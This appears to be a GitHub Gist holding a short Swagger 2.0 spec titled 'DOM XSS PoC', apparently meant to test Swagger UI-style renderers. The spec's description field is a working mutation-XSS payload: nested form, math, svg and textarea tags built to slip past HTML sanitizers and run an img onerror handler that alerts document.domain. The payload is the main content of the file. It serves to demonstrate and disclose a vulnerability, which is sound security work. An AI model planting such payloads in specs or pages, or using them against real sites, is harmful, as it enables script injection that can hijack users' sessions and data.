Created
May 19, 2025 07:07
-
-
Save appsecmpt/c53a3a14442fca564a39a91c5cc6c475 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
info: | |
version: "0.0.1" | |
title: DOM XSS PoC | |
description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1>"></form> | |
paths: | |
/: | |
get: | |
responses: | |
200: | |
description: Success |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment